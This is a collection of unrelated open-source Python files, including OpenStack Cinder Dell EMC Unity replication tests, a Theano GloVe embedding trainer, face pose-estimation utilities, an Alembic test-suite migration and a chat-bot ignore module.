'san_login': 'user2',
'san_password': '<PASSWORD>',
'max_time_out_of_sync': 180
},
'expected': [
'secondary_unity', '2.2.2.2', 'user2', '<PASSWORD>', 180
]
},
)
@ddt.unpack
def test_init(self, conf_dict, expected):
self.driver.configuration.replication_device = conf_dict
device = replication.ReplicationDevice(conf_dict, self.driver)
self.assertListEqual(
[device.backend_id, device.san_ip, device.san_login,
device.san_password, device.max_time_out_of_sync],
expected)
self.assertIs(self.driver, device.driver)
@ddt.data(
{
'conf_dict': {'san_ip': '2.2.2.2'},
},
{
'conf_dict': {'backend_id': ' ', 'san_ip': '2.2.2.2'},
},
{
'conf_dict': {'backend_id': 'secondary_unity'},
},
{
'conf_dict': {'backend_id': 'secondary_unity', 'san_ip': ' '},
},
{
'conf_dict': {
'backend_id': 'secondary_unity',
'san_ip': '2.2.2.2',
'san_login': 'user2',
'san_password': '<PASSWORD>',
'max_time_out_of_sync': 'NOT_A_NUMBER'
},
},
)
@ddt.unpack
def test_init_raise(self, conf_dict):
self.driver.configuration.replication_device = conf_dict
self.assertRaisesRegex(exception.InvalidConfigurationValue,
'Value .* is not valid for configuration '
'option "unity-backend.replication_device"',
replication.ReplicationDevice,
conf_dict, self.driver)
@ddt.data(
{
'conf_dict': {
'backend_id': 'secondary_unity',
'san_ip': '2.2.2.2'
},
'expected': [
'2.2.2.2', 'user1', '<PASSWORD>'
]
},
{
'conf_dict': {
'backend_id': 'secondary_unity',
'san_ip': '2.2.2.2',
'san_login': 'user2',
'san_password': '<PASSWORD>',
'max_time_out_of_sync': 180
},
'expected': [
'2.2.2.2', 'user2', '<PASSWORD>'
]
},
)
@ddt.unpack
def test_device_conf(self, conf_dict, expected):
self.driver.configuration.replication_device = conf_dict
device = replication.ReplicationDevice(conf_dict, self.driver)
c = device.device_conf
self.assertListEqual([c.san_ip, c.san_login, c.san_password],
expected)
def test_setup_adapter(self):
self.replication_device.setup_adapter()
# Not call adapter.do_setup after initial setup done.
self.replication_device.setup_adapter()
self.mock_adapter.do_setup.assert_called_once()
def test_setup_adapter_fail(self):
def f(*args):
raise exception.VolumeBackendAPIException('adapter setup failed')
self.mock_adapter.do_setup = mock.MagicMock(side_effect=f)
with self.assertRaises(exception.VolumeBackendAPIException):
self.replication_device.setup_adapter()
def test_adapter(self):
self.assertIs(self.mock_adapter, self.replication_device.adapter)
self.mock_adapter.do_setup.assert_called_once()
def test_destination_pool(self):
self.mock_adapter.storage_pools_map = {'pool-1': 'pool-1'}
self.assertEqual('pool-1', self.replication_device.destination_pool)
@ddt.ddt
class UnityReplicationManagerTest(unittest.TestCase):
def setUp(self):
self.config = conf.Configuration(san_opts,
config_group='unity-backend')
self.config.san_ip = '1.1.1.1'
self.config.san_login = 'user1'
self.config.san_password = '<PASSWORD>'
self.config.replication_device = [
{'backend_id': 'secondary_unity', 'san_ip': '2.2.2.2'}
]
self.driver = driver.UnityDriver(configuration=self.config)
self.replication_manager = replication.ReplicationManager()
@mock.patch('cinder.volume.drivers.dell_emc.unity.'
'replication.ReplicationDevice.setup_adapter')
def test_do_setup(self, mock_setup_adapter):
self.replication_manager.do_setup(self.driver)
calls = [mock.call(), mock.call()]
default_device = self.replication_manager.default_device
self.assertEqual('1.1.1.1', default_device.san_ip)
self.assertEqual('user1', default_device.san_login)
self.assertEqual('password1', default_device.san_password)
devices = self.replication_manager.replication_devices
self.assertEqual(1, len(devices))
self.assertIn('secondary_unity', devices)
rep_device = devices['secondary_unity']
self.assertEqual('2.2.2.2', rep_device.san_ip)
self.assertEqual('user1', rep_device.san_login)
self.assertEqual('<PASSWORD>', rep_device.san_password)
self.assertTrue(self.replication_manager.is_replication_configured)
self.assertTrue(
self.replication_manager.active_backend_id is None
or self.replication_manager.active_backend_id == 'default')
self.assertFalse(self.replication_manager.is_service_failed_over)
active_adapter = self.replication_manager.active_adapter
calls.append(mock.call())
self.assertIs(default_device.adapter, active_adapter)
calls.append(mock.call())
mock_setup_adapter.assert_has_calls(calls)
@mock.patch('cinder.volume.drivers.dell_emc.unity.'
'replication.ReplicationDevice.setup_adapter')
def test_do_setup_replication_not_configured(self, mock_setup_adapter):
self.driver.configuration.replication_device = None
self.replication_manager.do_setup(self.driver)
calls = [mock.call()]
default_device = self.replication_manager.default_device
self.assertEqual('1.1.1.1', default_device.san_ip)
self.assertEqual('user1', default_device.san_login)
self.assertEqual('<PASSWORD>', default_device.san_password)
devices = self.replication_manager.replication_devices
self.assertEqual(0, len(devices))
self.assertFalse(self.replication_manager.is_replication_configured)
self.assertTrue(
self.replication_manager.active_backend_id is None
or self.replication_manager.active_backend_id == 'default')
self.assertFalse(self.replication_manager.is_service_failed_over)
active_adapter = self.replication_manager.active_adapter
calls.append(mock.call())
self.assertIs(default_device.adapter, active_adapter)
calls.append(mock.call())
mock_setup_adapter.assert_has_calls(calls)
@mock.patch('cinder.volume.drivers.dell_emc.unity.'
'replication.ReplicationDevice.setup_adapter')
def test_do_setup_failed_over(self, mock_setup_adapter):
self.driver = driver.UnityDriver(configuration=self.config,
active_backend_id='secondary_unity')
self.replication_manager.do_setup(self.driver)
calls = [mock.call()]
default_device = self.replication_manager.default_device
self.assertEqual('1.1.1.1', default_device.san_ip)
self.assertEqual('user1', default_device.san_login)
self.assertEqual('<PASSWORD>', default_device.san_password)
devices = self.replication_manager.replication_devices
self.assertEqual(1, len(devices))
self.assertIn('secondary_unity', devices)
rep_device = devices['secondary_unity']
self.assertEqual('2.2.2.2', rep_device.san_ip)
self.assertEqual('user1', rep_device.san_login)
self.assertEqual('<PASSWORD>', rep_device.san_password)
self.assertTrue(self.replication_manager.is_replication_configured)
self.assertEqual('secondary_unity',
self.replication_manager.active_backend_id)
self.assertTrue(self.replication_manager.is_service_failed_over)
active_adapter = self.replication_manager.active_adapter
calls.append(mock.call())
self.assertIs(rep_device.adapter, active_adapter)
calls.append(mock.call())
mock_setup_adapter.assert_has_calls(calls)
@ddt.data(
{
'rep_device': [{
'backend_id': 'default', 'san_ip': '2.2.2.2'
}]
},
{
'rep_device': [{
'backend_id': 'secondary_unity', 'san_ip': '2.2.2.2'
}, {
'backend_id': 'default', 'san_ip': '3.3.3.3'
}]
},
{
'rep_device': [{
'backend_id': 'secondary_unity', 'san_ip': '2.2.2.2'
}, {
'backend_id': 'third_unity', 'san_ip': '3.3.3.3'
}]
},
)
@ddt.unpack
@mock.patch('cinder.volume.drivers.dell_emc.unity.'
'replication.ReplicationDevice.setup_adapter')
def test_do_setup_raise_invalid_rep_device(self, mock_setup_adapter,
rep_device):
self.driver.configuration.replication_device = rep_device
self.assertRaises(exception.InvalidConfigurationValue,
self.replication_manager.do_setup,
self.driver)
@mock.patch('cinder.volume.drivers.dell_emc.unity.'
'replication.ReplicationDevice.setup_adapter')
def test_do_setup_raise_invalid_active_backend_id(self,
mock_setup_adapter):
self.driver = driver.UnityDriver(configuration=self.config,
active_backend_id='third_unity')
self.assertRaises(exception.InvalidConfigurationValue,
self.replication_manager.do_setup,
self.driver)
@mock.patch('cinder.volume.drivers.dell_emc.unity.'
'replication.ReplicationDevice.setup_adapter')
def test_failover_service(self, mock_setup_adapter):
self.assertIsNone(self.replication_manager.active_backend_id)
self.replication_manager.do_setup(self.driver)
self.replication_manager.active_adapter
self.assertEqual('default',
self.replication_manager.active_backend_id)
self.replication_manager.failover_service('secondary_unity')
self.assertEqual('secondary_unity',
self.replication_manager.active_backend_id)
|
glove.py | tliu526/gram | 218 | 12685226 | import sys, time, random
import numpy as np
import theano
import theano.tensor as T
from theano import config
from theano.ifelse import ifelse
import cPickle as pickle
from collections import OrderedDict
def numpy_floatX(data):
return np.asarray(data, dtype=config.floatX)
def unzip(zipped):
new_params = OrderedDict()
for k, v in zipped.iteritems():
new_params[k] = v.get_value()
return new_params
def init_params(options):
params = OrderedDict()
inputSize = options['inputSize']
dimensionSize = options['dimensionSize']
rng = np.random.RandomState(1234)
params['w'] = np.asarray(rng.uniform(low=-0.1, high=0.1, size=(inputSize, dimensionSize)), dtype=theano.config.floatX)
rng = np.random.RandomState(12345)
params['w_tilde'] = np.asarray(rng.uniform(low=-0.1, high=0.1, size=(inputSize, dimensionSize)), dtype=theano.config.floatX)
params['b'] = np.zeros(inputSize).astype(theano.config.floatX)
params['b_tilde'] = np.zeros(inputSize).astype(theano.config.floatX)
return params
def init_tparams(params):
tparams = OrderedDict()
for k, v in params.iteritems():
tparams[k] = theano.shared(v, name=k)
return tparams
def build_model(tparams, options):
weightVector = T.vector('weightVector', dtype=theano.config.floatX)
iVector = T.vector('iVector', dtype='int32')
jVector = T.vector('jVector', dtype='int32')
cost = weightVector * (((tparams['w'][iVector] * tparams['w_tilde'][jVector]).sum(axis=1) + tparams['b'][iVector] + tparams['b_tilde'][jVector] - T.log(weightVector)) ** 2)
return weightVector, iVector, jVector, cost.sum()
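# Editorial note (not part of the original source): the cost above is a GloVe-style
# objective,
#     J = sum_ij f(X_ij) * (w_i . w~_j + b_i + b~_j - log(target_ij))^2
# where w / w~ are the two embedding matrices and b / b~ their bias vectors. In this
# implementation weightVector already holds f(X_ij) (see weightFunction below) and is
# used both as the multiplicative weight and inside the log() target, whereas the
# original GloVe paper uses log(X_ij) as the regression target.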
def adadelta(tparams, grads, weightVector, iVector, jVector, cost):
zipped_grads = [theano.shared(p.get_value() * numpy_floatX(0.), name='%s_grad' % k) for k, p in tparams.iteritems()]
running_up2 = [theano.shared(p.get_value() * numpy_floatX(0.), name='%s_rup2' % k) for k, p in tparams.iteritems()]
running_grads2 = [theano.shared(p.get_value() * numpy_floatX(0.), name='%s_rgrad2' % k) for k, p in tparams.iteritems()]
zgup = [(zg, g) for zg, g in zip(zipped_grads, grads)]
rg2up = [(rg2, 0.95 * rg2 + 0.05 * (g ** 2)) for rg2, g in zip(running_grads2, grads)]
f_grad_shared = theano.function([weightVector, iVector, jVector], cost, updates=zgup + rg2up, name='adadelta_f_grad_shared')
updir = [-T.sqrt(ru2 + 1e-6) / T.sqrt(rg2 + 1e-6) * zg for zg, ru2, rg2 in zip(zipped_grads, running_up2, running_grads2)]
ru2up = [(ru2, 0.95 * ru2 + 0.05 * (ud ** 2)) for ru2, ud in zip(running_up2, updir)]
param_up = [(p, p + ud) for p, ud in zip(tparams.values(), updir)]
f_update = theano.function([], [], updates=ru2up + param_up, on_unused_input='ignore', name='adadelta_f_update')
return f_grad_shared, f_update
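# Editorial note (not part of the original source): the function above is AdaDelta
# (Zeiler, 2012) with rho = 0.95 and eps = 1e-6:
#     E[g^2]_t  = rho * E[g^2]_{t-1}  + (1 - rho) * g_t^2
#     dx_t      = - sqrt(E[dx^2]_{t-1} + eps) / sqrt(E[g^2]_t + eps) * g_t
#     E[dx^2]_t = rho * E[dx^2]_{t-1} + (1 - rho) * dx_t^2
#     x_{t+1}   = x_t + dx_t
# f_grad_shared evaluates the cost and accumulates the gradient statistics, and
# f_update applies the parameter step.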
def weightFunction(x):
if x < 100.0:
return (x / 100.0) ** 0.75
else:
return 1
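# Editorial note (not part of the original source): this is the GloVe weighting
#     f(x) = (x / x_max)^alpha  if x < x_max  else  1
# hard-coded with x_max = 100 and alpha = 0.75; the x_max / alpha arguments of
# train_glove() are accepted but not forwarded here.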
def load_data(infile):
cooccurMap = pickle.load(open(infile, 'rb'))
I = []
J = []
Weight = []
for key, value in cooccurMap.iteritems():
I.append(key[0])
J.append(key[1])
Weight.append(weightFunction(value))
shared_I = theano.shared(np.asarray(I, dtype='int32'), borrow=True)
shared_J = theano.shared(np.asarray(J, dtype='int32'), borrow=True)
shared_Weight = theano.shared(np.asarray(Weight, dtype=theano.config.floatX), borrow=True)
return shared_I, shared_J, shared_Weight
def print2file(buf, outFile):
outfd = open(outFile, 'a')
outfd.write(buf + '\n')
outfd.close()
def train_glove(infile, inputSize=20000, batchSize=100, dimensionSize=100, maxEpochs=1000, outfile='result', x_max=100, alpha=0.75):
options = locals().copy()
print 'initializing parameters'
params = init_params(options)
tparams = init_tparams(params)
print 'loading data'
I, J, Weight = load_data(infile)
n_batches = int(np.ceil(float(I.get_value(borrow=True).shape[0]) / float(batchSize)))
print 'building models'
weightVector, iVector, jVector, cost = build_model(tparams, options)
grads = T.grad(cost, wrt=tparams.values())
f_grad_shared, f_update = adadelta(tparams, grads, weightVector, iVector, jVector, cost)
logFile = outfile + '.log'
print 'training start'
for epoch in xrange(maxEpochs):
costVector = []
iteration = 0
for batchIndex in random.sample(range(n_batches), n_batches):
cost = f_grad_shared(Weight.get_value(borrow=True, return_internal_type=True)[batchIndex*batchSize:(batchIndex+1)*batchSize],
I.get_value(borrow=True, return_internal_type=True)[batchIndex*batchSize: (batchIndex+1)*batchSize],
J.get_value(borrow=True, return_internal_type=True)[batchIndex*batchSize: (batchIndex+1)*batchSize])
f_update()
costVector.append(cost)
if (iteration % 1000 == 0):
buf = 'epoch:%d, iteration:%d/%d, cost:%f' % (epoch, iteration, n_batches, cost)
print buf
print2file(buf, logFile)
iteration += 1
trainCost = np.mean(costVector)
buf = 'epoch:%d, cost:%f' % (epoch, trainCost)
print buf
print2file(buf, logFile)
tempParams = unzip(tparams)
np.savez_compressed(outfile + '.' + str(epoch), **tempParams)
def get_rootCode(treeFile):
tree = pickle.load(open(treeFile, 'rb'))
return tree.values()[0][1]
if __name__=='__main__':
infile = sys.argv[1]
treeFile = sys.argv[2]
outfile = sys.argv[3]
inputDimSize = get_rootCode(treeFile+'.level2.pk') + 1
embDimSize = 128
batchSize = 100
maxEpochs = 50
train_glove(infile, inputSize=inputDimSize, batchSize=batchSize, dimensionSize=embDimSize, maxEpochs=maxEpochs, outfile=outfile)
|
demo/face/utils/estimate_pose.py | shachargluska/centerpose | 245 | 12685296 | <reponame>shachargluska/centerpose<gh_stars>100-1000
# coding: UTF-8
from math import asin, atan2, cos, sin
import numpy as np
def isRotationMatrix(R):
    ''' checks whether a matrix is a valid rotation matrix (i.e. whether R^T * R is close to the identity)
'''
Rt = np.transpose(R)
shouldBeIdentity = np.dot(Rt, R)
I = np.identity(3, dtype=R.dtype)
n = np.linalg.norm(I - shouldBeIdentity)
return n < 1e-6
def matrix2angle(R):
''' compute three Euler angles from a Rotation Matrix. Ref: http://www.gregslabaugh.net/publications/euler.pdf
Args:
R: (3,3). rotation matrix
Returns:
x: yaw
y: pitch
z: roll
'''
# assert(isRotationMatrix(R))
    if R[2, 0] != 1 and R[2, 0] != -1:  # not a gimbal-lock configuration
x = asin(R[2, 0])
y = atan2(R[2, 1] / cos(x), R[2, 2] / cos(x))
z = atan2(R[1, 0] / cos(x), R[0, 0] / cos(x))
else: # Gimbal lock
z = 0 # can be anything
if R[2, 0] == -1:
x = np.pi / 2
y = z + atan2(R[0, 1], R[0, 2])
else:
x = -np.pi / 2
y = -z + atan2(-R[0, 1], -R[0, 2])
return x, y, z
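# Editorial note (not part of the original source): for |R[2, 0]| != 1 the branch
# above recovers
#     x = asin(R[2, 0])
#     y = atan2(R[2, 1] / cos(x), R[2, 2] / cos(x))
#     z = atan2(R[1, 0] / cos(x), R[0, 0] / cos(x))
# and R[2, 0] = +/-1 is the gimbal-lock case, where only a combination of the two
# remaining angles is determined, so z is fixed to 0 and y absorbs the leftover
# rotation (see the referenced Slabaugh note for the derivation).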
def P2sRt(P):
    ''' decomposing camera matrix P.
Args:
P: (3, 4). Affine Camera Matrix.
Returns:
s: scale factor.
R: (3, 3). rotation matrix.
t2d: (2,). 2d translation.
'''
t2d = P[:2, 3]
R1 = P[0:1, :3]
R2 = P[1:2, :3]
s = (np.linalg.norm(R1) + np.linalg.norm(R2)) / 2.0
r1 = R1 / np.linalg.norm(R1)
r2 = R2 / np.linalg.norm(R2)
r3 = np.cross(r1, r2)
R = np.concatenate((r1, r2, r3), 0)
return s, R, t2d
def compute_similarity_transform(points_static, points_to_transform):
# http://nghiaho.com/?page_id=671
p0 = np.copy(points_static).T
p1 = np.copy(points_to_transform).T
t0 = -np.mean(p0, axis=1).reshape(3, 1)
t1 = -np.mean(p1, axis=1).reshape(3, 1)
t_final = t1 - t0
p0c = p0 + t0
p1c = p1 + t1
covariance_matrix = p0c.dot(p1c.T)
U, S, V = np.linalg.svd(covariance_matrix)
R = U.dot(V)
if np.linalg.det(R) < 0:
R[:, 2] *= -1
rms_d0 = np.sqrt(np.mean(np.linalg.norm(p0c, axis=0) ** 2))
rms_d1 = np.sqrt(np.mean(np.linalg.norm(p1c, axis=0) ** 2))
s = (rms_d0 / rms_d1)
P = np.c_[s * np.eye(3).dot(R), t_final]
return P
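# Editorial note (not part of the original source): this is a Kabsch/Procrustes-style
# alignment -- both point sets are centred, the rotation is taken from the SVD of the
# 3x3 covariance matrix (with a reflection fix when det(R) < 0), the scale is the
# ratio of the RMS radii of the two centred sets, and the result is packed into a
# 3x4 affine matrix [s*R | t] that estimate_pose() decomposes again via P2sRt().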
def estimate_pose(vertices):
canonical_vertices = np.load('face/utils/uv_data/canonical_vertices.npy')
P = compute_similarity_transform(vertices, canonical_vertices)
_, R, _ = P2sRt(P) # decompose affine matrix to s, R, t
pose = matrix2angle(R)
return P, pose
|
migrations/versions/5177cfff57d7_add_testgroup_and_te.py | vault-the/changes | 443 | 12685314 | <reponame>vault-the/changes<filename>migrations/versions/5177cfff57d7_add_testgroup_and_te.py
"""Add TestGroup and TestSuite
Revision ID: 5177cfff57d7
Revises: <PASSWORD>
Create Date: 2013-11-04 12:42:37.249656
"""
from __future__ import absolute_import, print_function
# revision identifiers, used by Alembic.
revision = '5<PASSWORD>c<PASSWORD>'
down_revision = '<PASSWORD>'
from alembic import op
from datetime import datetime
from hashlib import sha1
from sqlalchemy.sql import table
from uuid import uuid4
import sqlalchemy as sa
def upgrade():
from changes.constants import Result
testsuites_table = table(
'testsuite',
sa.Column('id', sa.GUID(), nullable=False),
sa.Column('build_id', sa.GUID(), nullable=False),
sa.Column('project_id', sa.GUID(), nullable=False),
sa.Column('name_sha', sa.String(length=40), nullable=False),
sa.Column('name', sa.Text(), nullable=True),
sa.Column('date_created', sa.DateTime(), nullable=True),
)
testgroups_table = table(
'testgroup',
sa.Column('id', sa.GUID(), nullable=False),
sa.Column('build_id', sa.GUID(), nullable=False),
sa.Column('project_id', sa.GUID(), nullable=False),
sa.Column('name_sha', sa.String(length=40), nullable=False),
sa.Column('duration', sa.Integer(), nullable=True),
sa.Column('num_tests', sa.Integer(), nullable=True),
sa.Column('num_failed', sa.Integer(), nullable=True),
sa.Column('name', sa.Text(), nullable=True),
sa.Column('date_created', sa.DateTime(), nullable=True),
)
testgroups_m2m_table = table(
'testgroup_test',
sa.Column('group_id', sa.GUID(), nullable=False),
sa.Column('test_id', sa.GUID(), nullable=False),
)
testcases_table = table(
'test',
sa.Column('id', sa.GUID(), nullable=False),
sa.Column('build_id', sa.GUID(), nullable=False),
sa.Column('project_id', sa.GUID(), nullable=False),
sa.Column('package', sa.Text(), nullable=True),
sa.Column('name', sa.Text(), nullable=True),
sa.Column('group', sa.Text(), nullable=True),
sa.Column('suite_id', sa.GUID(), nullable=True),
sa.Column('duration', sa.Integer(), nullable=True),
sa.Column('result', sa.Enum(), nullable=True),
)
connection = op.get_bind()
### commands auto generated by Alembic - please adjust! ###
op.create_table('testsuite',
sa.Column('id', sa.GUID(), nullable=False),
sa.Column('build_id', sa.GUID(), nullable=False),
sa.Column('project_id', sa.GUID(), nullable=False),
sa.Column('name_sha', sa.String(length=40), nullable=False),
sa.Column('name', sa.Text(), nullable=True),
sa.Column('date_created', sa.DateTime(), nullable=True),
sa.ForeignKeyConstraint(['build_id'], ['build.id'], ),
sa.ForeignKeyConstraint(['project_id'], ['project.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('build_id','name_sha', name='_suite_key')
)
op.create_table('testgroup',
sa.Column('id', sa.GUID(), nullable=False),
sa.Column('build_id', sa.GUID(), nullable=False),
sa.Column('project_id', sa.GUID(), nullable=False),
sa.Column('suite_id', sa.GUID(), nullable=True),
sa.Column('parent_id', sa.GUID(), nullable=True),
sa.Column('name_sha', sa.String(length=40), nullable=False),
sa.Column('name', sa.Text(), nullable=True),
sa.Column('duration', sa.Integer(), default=0, nullable=True),
sa.Column('num_tests', sa.Integer(), default=0, nullable=True),
sa.Column('num_failed', sa.Integer(), default=0, nullable=True),
sa.Column('data', sa.JSONEncodedDict(), nullable=True),
sa.Column('date_created', sa.DateTime(), nullable=True),
sa.ForeignKeyConstraint(['build_id'], ['build.id'], ),
sa.ForeignKeyConstraint(['parent_id'], ['testgroup.id'], ),
sa.ForeignKeyConstraint(['project_id'], ['project.id'], ),
sa.ForeignKeyConstraint(['suite_id'], ['testsuite.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('build_id','suite_id','name_sha', name='_group_key')
)
op.create_table('testgroup_test',
sa.Column('group_id', sa.GUID(), nullable=False),
sa.Column('test_id', sa.GUID(), nullable=False),
sa.ForeignKeyConstraint(['group_id'], ['testgroup.id'], ),
sa.ForeignKeyConstraint(['test_id'], ['test.id'], ),
sa.PrimaryKeyConstraint('group_id', 'test_id')
)
op.add_column(u'test', sa.Column('suite_id', sa.GUID(), nullable=True))
# perform data migrations
for testcase in connection.execute(testcases_table.select()):
# migrate group to suite
print("Migrating TestCase %s" % (testcase.id,))
suite_name = testcase.group or 'default'
suite_sha = sha1(suite_name).hexdigest()
result = connection.execute(testsuites_table.select().where(sa.and_(
testsuites_table.c.build_id == testcase.build_id,
testsuites_table.c.name_sha == suite_sha,
)).limit(1)).fetchone()
if not result:
suite_id = uuid4()
connection.execute(
testsuites_table.insert().values(
id=suite_id,
build_id=testcase.build_id,
project_id=testcase.project_id,
name=suite_name,
name_sha=suite_sha,
date_created=datetime.utcnow(),
)
)
else:
suite_id = result[0]
connection.execute(
testcases_table.update().where(
testcases_table.c.id == testcase.id,
).values({
testcases_table.c.suite_id: suite_id,
})
)
# add package as group
group_name = testcase.package or testcase.name.rsplit('.', 1)[1]
group_sha = sha1(group_name).hexdigest()
result = connection.execute(testgroups_table.select().where(sa.and_(
testgroups_table.c.build_id == testcase.build_id,
testgroups_table.c.name_sha == group_sha,
)).limit(1)).fetchone()
if not result:
group_id = uuid4()
connection.execute(
testgroups_table.insert().values(
id=group_id,
build_id=testcase.build_id,
project_id=testcase.project_id,
name=group_name,
name_sha=group_sha,
date_created=datetime.utcnow(),
duration=0,
num_tests=0,
num_failed=0,
)
)
else:
group_id = result[0]
update_values = {
testgroups_table.c.num_tests: testgroups_table.c.num_tests + 1,
testgroups_table.c.duration: testgroups_table.c.duration + testcase.duration,
}
if testcase.result == Result.failed.value:
update_values[testgroups_table.c.num_failed] = testgroups_table.c.num_failed + 1
connection.execute(testgroups_m2m_table.insert().values({
testgroups_m2m_table.c.group_id: group_id,
testgroups_m2m_table.c.test_id: testcase.id,
}))
connection.execute(testgroups_table.update().where(
testgroups_table.c.id == group_id,
).values(update_values))
op.drop_column(u'test', u'group')
op.drop_column(u'test', u'group_sha')
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column(u'test', sa.Column(u'group_sha', sa.VARCHAR(length=40), nullable=True))
op.add_column(u'test', sa.Column(u'group', sa.TEXT(), nullable=True))
op.drop_column(u'test', 'suite_id')
op.drop_table('testgroup_test')
op.drop_table('testgroup')
op.drop_table('testsuite')
### end Alembic commands ###
|
python/graphscope/nx/tests/algorithms/forward/test_threshold.py | LI-Mingyu/GraphScope-MY | 1,521 | 12685342 | import networkx.algorithms.tests.test_threshold
import pytest
from graphscope.nx.utils.compat import import_as_graphscope_nx
from graphscope.nx.utils.compat import with_graphscope_nx_context
import_as_graphscope_nx(networkx.algorithms.tests.test_threshold,
decorators=pytest.mark.usefixtures("graphscope_session"))
from networkx.algorithms.tests.test_threshold import TestGeneratorThreshold
@pytest.mark.usefixtures("graphscope_session")
@with_graphscope_nx_context(TestGeneratorThreshold)
class TestGeneratorThreshold:
def test_eigenvectors(self):
np = pytest.importorskip('numpy')
eigenval = np.linalg.eigvals
scipy = pytest.importorskip('scipy')
cs = 'ddiiddid'
G = nxt.threshold_graph(cs)
(tgeval, tgevec) = nxt.eigenvectors(cs)
dot = np.dot
assert [abs(dot(lv, lv) - 1.0) < 1e-9 for lv in tgevec] == [True] * 8
def test_create_using(self):
cs = 'ddiiddid'
G = nxt.threshold_graph(cs)
assert pytest.raises(nx.exception.NetworkXError,
nxt.threshold_graph,
cs,
create_using=nx.DiGraph())
|
pajbot/modules/basic/ignore.py | UVClay/SkookumBot | 145 | 12685348 | import logging
from pajbot.managers.db import DBManager
from pajbot.models.command import Command
from pajbot.models.command import CommandExample
from pajbot.models.user import User
from pajbot.modules import BaseModule
from pajbot.modules import ModuleType
from pajbot.modules.basic import BasicCommandsModule
log = logging.getLogger(__name__)
class IgnoreModule(BaseModule):
ID = __name__.split(".")[-1]
NAME = "Ignore"
DESCRIPTION = "Ignore all commands from a user"
CATEGORY = "Feature"
ENABLED_DEFAULT = True
MODULE_TYPE = ModuleType.TYPE_ALWAYS_ENABLED
PARENT_MODULE = BasicCommandsModule
@staticmethod
def ignore_command(bot, source, message, **rest):
if not message:
return False
with DBManager.create_session_scope() as db_session:
username = message.split(" ")[0]
user = User.find_by_user_input(db_session, username)
if user == source:
bot.whisper(source, "You cannot ignore yourself")
return False
with DBManager.create_session_scope() as db_session:
user = User.find_by_user_input(db_session, username)
if user is None:
bot.whisper(source, "No user with that name found.")
return False
if user.ignored:
bot.whisper(source, "User is already ignored.")
return False
user.ignored = True
bot.whisper(source, f"Now ignoring {user}")
@staticmethod
def unignore_command(bot, source, message, **rest):
if not message:
return
username = message.split(" ")[0]
with DBManager.create_session_scope() as db_session:
user = User.find_by_user_input(db_session, username)
if not user:
bot.whisper(source, "No user with that name found.")
return False
if user.ignored is False:
bot.whisper(source, "User is not ignored.")
return False
user.ignored = False
bot.whisper(source, f"No longer ignoring {user}")
def load_commands(self, **options):
self.commands["ignore"] = Command.raw_command(
self.ignore_command,
level=1000,
description="Ignore a user, which means he can't run any commands",
examples=[
CommandExample(
None,
"Default usage",
chat="user:!ignore Karl_Kons\n" "bot>user:Now ignoring Karl_Kons",
description="Ignore user Karl_Kons",
).parse()
],
)
self.commands["unignore"] = Command.raw_command(
self.unignore_command,
level=1000,
description="Unignore a user",
examples=[
CommandExample(
None,
"Default usage",
chat="user:!unignore Karl_Kons\n" "bot>user:No longer ignoring Karl_Kons",
description="Unignore user Karl_Kons",
).parse()
],
)
|
src/main/resources/resource/I2cMux/I2cMux.py | holgerfriedrich/myrobotlab | 179 | 12685355 | <gh_stars>100-1000
port="COM3"
#
if ('virtual' in globals() and virtual):
virtualArduino = Runtime.start("virtualArduino", "VirtualArduino")
virtualArduino.connect(port)
ard = Runtime.createAndStart("Arduino","Arduino")
ard.connect(port)
#
i2cmux = Runtime.createAndStart("i2cMux","I2cMux")
# From version 1.0.2316 use attach instead of setController
# i2cmux.setController(ard,"1","0x70")
i2cmux.attach(ard,"1","0x70")
#
mpu6050_0 = Runtime.createAndStart("Mpu6050-0","Mpu6050")
mpu6050_0.attach(i2cmux,"0","0x68")
mpu6050_1 = Runtime.createAndStart("Mpu6050-1","Mpu6050")
mpu6050_1.attach(i2cmux,"1","0x68")
|
tools/sts-job-manager/lib/table_util.py | ruchirjain86/professional-services | 2,116 | 12685361 | <reponame>ruchirjain86/professional-services<filename>tools/sts-job-manager/lib/table_util.py
#!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The file contains a list of table-related operations.
"""
import logging
import os
from typing import List
from google.cloud import bigquery
from lib.options import BigQueryOptions
from lib.services import Services
logger = logging.getLogger(__name__)
logger.setLevel(os.environ.get("LOGLEVEL", "INFO").upper())
def create_table(client: Services.bigquery, options: BigQueryOptions,
table_name: str, schema: List[bigquery.SchemaField]):
"""
    Creates a table. Does not throw if the table already exists.
"""
logger.debug(f"Creating `{table_name}` table if it does not exists...")
table_ref = get_table_ref(client, options, table_name)
table = bigquery.Table(table_ref, schema=schema)
client.create_table(table, exists_ok=True)
logger.debug("...done.")
def create_dataset(client: Services.bigquery, options: BigQueryOptions):
"""
Creates a dataset.
"""
dataset_ref = get_dataset_ref(client, options)
logger.info(
f"Creating dataset '{dataset_ref.dataset_id}' if it does not exist...")
dataset = bigquery.Dataset(dataset_ref)
dataset.location = options.dataset_location
dataset = client.create_dataset(dataset, exists_ok=True)
logger.info("...done.")
def get_dataset_ref(client: Services.bigquery, options: BigQueryOptions):
"""
Determine a dataset reference based on given parameters
"""
return bigquery.dataset.DatasetReference(client.project,
options.dataset_name)
def get_table_identifier(services: Services, options: BigQueryOptions,
table_name: str) -> str:
"""
Generates a table identifier in `PROJECT.DATASET.TABLE` format
"""
table_ref = get_table_ref(services.bigquery, options, table_name)
return '.'.join([table_ref.project, table_ref.dataset_id,
table_ref.table_id])
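# Illustrative usage sketch (values are hypothetical, not from the original source):
#   get_table_identifier(services, options, 'job_status')
#   # -> 'my-project.my_dataset.job_status' for matching project / dataset options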
def get_table_ref(client: Services.bigquery, options: BigQueryOptions,
table_name: str):
"""
Determine a table reference based on given parameters
"""
dataset_ref = get_dataset_ref(client, options)
table_ref = bigquery.table.TableReference(dataset_ref, table_name)
return table_ref
|
salesforce/api/metadata.py | xjsender/haoide | 237 | 12685370 | <filename>salesforce/api/metadata.py<gh_stars>100-1000
import sublime
import time
import pprint
import os
import csv
import json
import datetime
